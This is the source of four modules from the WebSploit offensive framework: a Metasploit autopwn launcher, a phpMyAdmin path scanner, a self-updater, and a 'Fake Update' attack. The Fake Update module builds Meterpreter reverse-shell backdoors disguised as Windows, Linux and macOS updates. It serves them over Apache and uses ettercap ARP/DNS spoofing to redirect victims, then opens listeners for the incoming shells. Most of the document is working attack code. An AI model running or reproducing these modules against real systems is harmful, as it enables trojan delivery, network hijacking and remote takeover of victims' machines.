#!/usr/bin/env python
#
# WebSploit FrameWork Autopwn module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
from time import sleep
from core import wcolors
from core import help
options = ["192.168.1.1"]
def autopwn():
	try:
		line = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line += ":"
		line += wcolors.color.UNDERL + wcolors.color.BLUE + "Autopwn" + wcolors.color.ENDC
		line += " > "
		com = raw_input (line)
		com = com.lower()
		if com[0:10] =='set target':
			options[0] = com[11:27]
			print "TARGET => ", options[0]
			autopwn()
		elif com[0:12]=='show options':
			print ""
			print "Options\t\t Value\t\t\t RQ\t Description"
			print "---------\t--------------\t\t----\t--------------"
			print "TARGET\t\t"+options[0]+"\t\t\tyes\tTarget IP Address"
			print ""
			autopwn()
		elif com[0:2] =='os':
			os.system(com[3:])
			autopwn()
		elif com[0:4] =='help':
			help.help()
			autopwn()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			print (wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
			print (wcolors.color.YELLOW + "[*]Please Wait ..." + wcolors.color.ENDC)
			sleep(2)
			os.system('cp modules/db_autopwn.rb /tmp;chmod +x /tmp/db_autopwn.rb')
			os.chdir('//tmp')
			check_tmp = os.listdir(os.curdir)
			if 'websploit_autopwn.rc' in check_tmp:
				os.system('rm -rf websploit_autopwn.rc')
			myfile = open('websploit_autopwn.rc', 'w')
			myfile.write ('workspace -d websploit\n')
			myfile.write ('workspace -a websploit\n')
			myfile.write ('db_nmap ' + options[0] + '\n')
			myfile.write ('load /tmp/db_autopwn.rb\n')
			myfile.write ('db_autopwn -t -x -p -e')
			myfile.close()
			os.system('msfconsole -r /tmp/websploit_autopwn.rc')
		else:
			print "Wrong Command => ", com
			autopwn()
	except(KeyboardInterrupt):
		print ""



#!/usr/bin/env python
#
# WebSploit Framework Fake Update module
# Idea By G0tmi1k
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import os
import subprocess
from time import sleep
from core import wcolors
from core import help
options = ["eth0", "192.168.1.1"]
def fakeupdate():
    try:
        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
        line_1 += ":"
        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Fake Update" + wcolors.color.ENDC
        line_1 += " > "
        com = raw_input(line_1)
        com = com.lower()
        if com[0:13] =='set interface':
            options[0] = com[14:20]
            print "INTERFACE => ", options[0]
            fakeupdate()
        elif com[0:9] =='set lhost':
            options[1] = com[10:25]
            print "LHOST => ", options[1]
            fakeupdate()
        elif com[0:12] =='show options':
            print ""
            print "Options\t\t Value\t\t\t\t RQ\t Description"
            print "---------\t--------------\t\t\t----\t--------------"
            print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
            print "LHOST\t\t"+options[1]+"\t\t\tyes\tLocal IP Address"
            print ""
            fakeupdate()
        elif com[0:2] =='os':
            os.system(com[3:])
            fakeupdate()
        elif com[0:4] =='help':
            help.help()
            fakeupdate()
        elif com[0:4] =='back':
            pass
        elif com[0:3] =='run':
            print(wcolors.color.CYAN + "[!]Checking Setting, Please Wait ..." + wcolors.color.ENDC)
            sleep(2)
            subprocess.Popen('rm -rf /var/www/index.php /var/www/index.html /var/www/Linux.jpg /var/www/OSX.jpg /var/www/Windows.jpg /var/www/favicon.ico /var/www/Windows-KB183905-ENU.exe /var/www/Linux-update-EN-659 /var/www/OSX-update-HT3131', stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
            subprocess.Popen('cp /usr/share/websploit/modules/fakeupdate/www/* /var/www/')
            print(wcolors.color.CYAN + "[*]Creating Backdoor For Windows OS ..." + wcolors.color.ENDC)
            cmd_1 = 'msfpayload windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 X > /var/www/Windows-KB183905-ENU.exe'
            subprocess.Popen(cmd_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            print(wcolors.color.CYAN + "[*]Creating Backdoor For Linux OS ..." + wcolors.color.ENDC)
            cmd_2 = 'msfpayload linux/x86/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4442 X > /var/www/Linux-update-EN-659'
            subprocess.Popen(cmd_2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            print(wcolors.color.CYAN + "[*]Creating Backdoor For MAC OSX ..." + wcolors.color.ENDC)
            cmd_3 = 'msfpayload osx/x86/shell_reverse_tcp LHOST=' + options[1] + ' LPORT=4443 X > /var/www/OSX-update-HT3131'
            subprocess.Popen(cmd_3, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            print(wcolors.color.GREEN + "[*]Create Backdoor's Successful." + wcolors.color.ENDC)
            sleep(2)
            print(wcolors.color.BLUE + "[*]Starting Web Server ..." + wcolors.color.ENDC)
            subprocess.Popen('service apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
            sleep(2)
            print(wcolors.color.BLUE + "[*]Starting DNS Spoofing ..." + wcolors.color.ENDC)
            try:
                os.chdir('/usr/local/share/ettercap')
                check_dir = os.listdir(os.curdir)
                if 'etter.dns' in check_dir:
                    subprocess.Popen('mv /usr/local/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
                my_etter = open('etter.dns', 'w')
                my_etter.write('*\tA' + '\t'+ options[1])
                my_etter.close()
            except(OSError):
                print(wcolors.color.RED + wcolors.color.BOLD + "[*]Checking Ettercap ... Please Wait ..." + wcolors.color.ENDC)
            try:
                os.chdir('/usr/share/ettercap')
                check_dir = os.listdir(os.curdir)
                if 'etter.dns' in check_dir:
                    subprocess.Popen('mv /usr/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
                my_etter = open('etter.dns', 'w')
                my_etter.write('*\tA' + '\t'+ options[1])
                my_etter.close()
            except(OSError):
                print(wcolors.color.BLUE +  "[*]Ettercap Launched ... [OK]" + wcolors.color.ENDC)
            dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
            subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            print(wcolors.color.BLUE + "[*]Starting Listener For Windows, Linux, MacOSX ..." + wcolors.color.ENDC)
            windows_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 E &'
            linux_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4442 E &'
            macosx_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcp LHOST=' + options[1] + ' LPORT=4443 E &'
            os.system(windows_listener)
            sleep(1)
            os.system(linux_listener)
            sleep(1)
            os.system(macosx_listener)
            print(wcolors.color.GREEN + "[*]Attack Has Been Started." + wcolors.color.ENDC)
            line_4 = wcolors.color.RED + "[!]When You Got The Session, Press [enter] Key For Kill DNS Spoof Attack ..." + wcolors.color.ENDC
            enter_key = raw_input(line_4)
            os.system('killall ettercap')
        else:
            print "Wrong Command => ", com
            fakeupdate()
    except(KeyboardInterrupt):
        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
        


#!/usr/bin/env python
#
# WebSploit Framework PHPMyAdmin Page Scanner module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

from time import sleep
from core import wcolors
from core import help
import httplib
import os
options =["http://google.com"]
def phpmyadmin():
	try:
		line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
		line_1 += ":"
		line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "PMA" + wcolors.color.ENDC
		line_1 += " > "
		com = raw_input(line_1)
		com = com.lower()
		if com[0:10] =='set target':
			options[0] = com[11:]
			print "TARGET => ", options[0]
			phpmyadmin()
		elif com[0:12] =='show options':
			print ""
			print "Options\t\t Value"
			print "---------\t--------------"
			print "TARGET\t\t"+options[0]
			print ""
			phpmyadmin()
		elif com[0:2] =='os':
			os.system(com[3:])
			phpmyadmin()
		elif com[0:4] =='help':
			help.help()
			phpmyadmin()
		elif com[0:4] =='back':
			pass
		elif com[0:3] =='run':
			options[0] = options[0].replace("http://", "")
			print(wcolors.color.GREEN + "[*] Your Target : " + options[0] + wcolors.color.ENDC)
			print(wcolors.color.BLUE + "[*]Loading Path List ... Please Wait ..." + wcolors.color.ENDC)
			sleep(2)
			paths = ['/phpMyAdmin/',
		'/phpmyadmin/',
		'/PMA/',
		'/admin/',
		'/dbadmin/',
		'/mysql/',
		'/myadmin/',
		'/phpmyadmin2/',
		'/phpMyAdmin2/',
		'/phpMyAdmin-2/',
		'/php-my-admin/',
		'/phpMyAdmin-2.2.3/',
		'/phpMyAdmin-2.2.6/',
		'/phpMyAdmin-2.5.1/',
		'/phpMyAdmin-2.5.4/',
		'/phpMyAdmin-2.5.5-rc1/',
		'/phpMyAdmin-2.5.5-rc2/',
		'/phpMyAdmin-2.5.5/',
		'/phpMyAdmin-2.5.5-pl1/',
		'/phpMyAdmin-2.5.6-rc1/',
		'/phpMyAdmin-2.5.6-rc2/',
		'/phpMyAdmin-2.5.6/',
		'/phpMyAdmin-2.5.7/',
		'/phpMyAdmin-2.5.7-pl1/',
		'/phpMyAdmin-2.6.0-alpha/',
		'/phpMyAdmin-2.6.0-alpha2/',
		'/phpMyAdmin-2.6.0-beta1/',
		'/phpMyAdmin-2.6.0-beta2/',
		'/phpMyAdmin-2.6.0-rc1/',
		'/phpMyAdmin-2.6.0-rc2/',
		'/phpMyAdmin-2.6.0-rc3/',
		'/phpMyAdmin-2.6.0/',
		'/phpMyAdmin-2.6.0-pl1/',
		'/phpMyAdmin-2.6.0-pl2/',
		'/phpMyAdmin-2.6.0-pl3/',
		'/phpMyAdmin-2.6.1-rc1/',
		'/phpMyAdmin-2.6.1-rc2/',
		'/phpMyAdmin-2.6.1/',
		'/phpMyAdmin-2.6.1-pl1/',
		'/phpMyAdmin-2.6.1-pl2/',
		'/phpMyAdmin-2.6.1-pl3/',
		'/phpMyAdmin-2.6.2-rc1/',
		'/phpMyAdmin-2.6.2-beta1/',
		'/phpMyAdmin-2.6.2-rc1/',
		'/phpMyAdmin-2.6.2/',
		'/phpMyAdmin-2.6.2-pl1/',
		'/phpMyAdmin-2.6.3/',
		'/phpMyAdmin-2.6.3-rc1/',
		'/phpMyAdmin-2.6.3/',
		'/phpMyAdmin-2.6.3-pl1/',
		'/phpMyAdmin-2.6.4-rc1/',
		'/phpMyAdmin-2.6.4-pl1/',
		'/phpMyAdmin-2.6.4-pl2/',
		'/phpMyAdmin-2.6.4-pl3/',
		'/phpMyAdmin-2.6.4-pl4/',
		'/phpMyAdmin-2.6.4/',
		'/phpMyAdmin-2.7.0-beta1/',
		'/phpMyAdmin-2.7.0-rc1/',
		'/phpMyAdmin-2.7.0-pl1/',
		'/phpMyAdmin-2.7.0-pl2/',
		'/phpMyAdmin-2.7.0/',
		'/phpMyAdmin-2.8.0-beta1/',
		'/phpMyAdmin-2.8.0-rc1/',
		'/phpMyAdmin-2.8.0-rc2/',
		'/phpMyAdmin-2.8.0/',
		'/phpMyAdmin-2.8.0.1/',
		'/phpMyAdmin-2.8.0.2/',
		'/phpMyAdmin-2.8.0.3/',
		'/phpMyAdmin-2.8.0.4/',
		'/phpMyAdmin-2.8.1-rc1/',
		'/phpMyAdmin-2.8.1/',
		'/phpMyAdmin-2.8.2/',
		'/sqlmanager/',
		'/mysqlmanager/',
		'/p/m/a/',
		'/PMA2005/',
		'/pma2005/',
		'/phpmanager/',
		'/php-myadmin/',
		'/phpmy-admin/',
		'/webadmin/',
		'/sqlweb/',
		'/websql/',
		'/webdb/',
		'/mysqladmin/',
		'/mysql-admin/',]
			try:
				for path in paths:
					path = path.replace("\n", "")
					conn = httplib.HTTPConnection(options[0])
					conn.request("GET", path)
					res = conn.getresponse()
					if(res.status==200):
						print(wcolors.color.BOLD + wcolors.color.GREEN + "[%s] ... [%s %s]" % (path, res.status, res.reason) + wcolors.color.ENDC)
					else:
						print(wcolors.color.YELLOW + "[%s] ... [%s %s]" % (path, res.status, res.reason) + wcolors.color.ENDC)
			except(KeyboardInterrupt, SystemExit):
				print(wcolors.color.RED + "[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
		else:
			print "Wrong Command => ", com
			phpmyadmin()
	except(KeyboardInterrupt, SystemExit):
		print(wcolors.color.RED + "[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)




#!/usr/bin/env python
#
# WebSploit FrameWork Update Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com

import subprocess
import os
from core import wcolors

def update_websploit():
	print wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC
	try:
		subprocess.Popen("cd /tmp;git clone https://github.com/websploit/websploit.git;cp -R websploit/ /usr/share;rm -rf /tmp/websploit/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
	except Exception, e:
		print wcolors.color.RED + "[!] Update Failed."+ wcolors.color.ENDC
		pass

	print wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC
if __name__ == "__main__":
	update_websploit()